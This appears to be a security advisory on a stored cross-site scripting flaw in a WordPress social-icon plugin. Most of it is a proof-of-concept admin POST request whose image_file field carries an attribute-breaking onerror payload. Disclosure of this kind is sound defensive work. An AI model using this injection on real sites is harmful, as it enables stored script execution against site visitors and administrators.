The plugin does not properly escape the image_file field when adding a new social icon, allowing high privileged users to inject arbitrary javascript even when the unfiltered_html capability is disallowed. Version 3.2.0 adressed some of the issues, but was still vulnerable when clicking to edit the contaminated icon.
POST /wp-admin/admin.php?page=cnss_social_icon_add HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryntci4RWsTIt6kFWd
Accept-Encoding: gzip, deflate
Cookie: [Admin cookies]
Connection: close
------WebKitFormBoundaryntci4RWsTIt6kFWd
Content-Disposition: form-data; name="_wpnonce"
482d64ba75
------WebKitFormBoundaryntci4RWsTIt6kFWd
Content-Disposition: form-data; name="_wp_http_referer"
/wp-admin/admin.php?page=cnss_social_icon_add
------WebKitFormBoundaryntci4RWsTIt6kFWd
Content-Disposition: form-data; name="title"
55
------WebKitFormBoundaryntci4RWsTIt6kFWd
Content-Disposition: form-data; name="image_file"
." onerror=alert``;//
------WebKitFormBoundaryntci4RWsTIt6kFWd
Content-Disposition: form-data; name="url"
1123
------WebKitFormBoundaryntci4RWsTIt6kFWd
Content-Disposition: form-data; name="sortorder"
4
------WebKitFormBoundaryntci4RWsTIt6kFWd
Content-Disposition: form-data; name="target"
1
------WebKitFormBoundaryntci4RWsTIt6kFWd
Content-Disposition: form-data; name="action"
update
------WebKitFormBoundaryntci4RWsTIt6kFWd
Content-Disposition: form-data; name="submit_button"
ė³ź²½ģ¬ķ ģ ģ„
------WebKitFormBoundaryntci4RWsTIt6kFWd--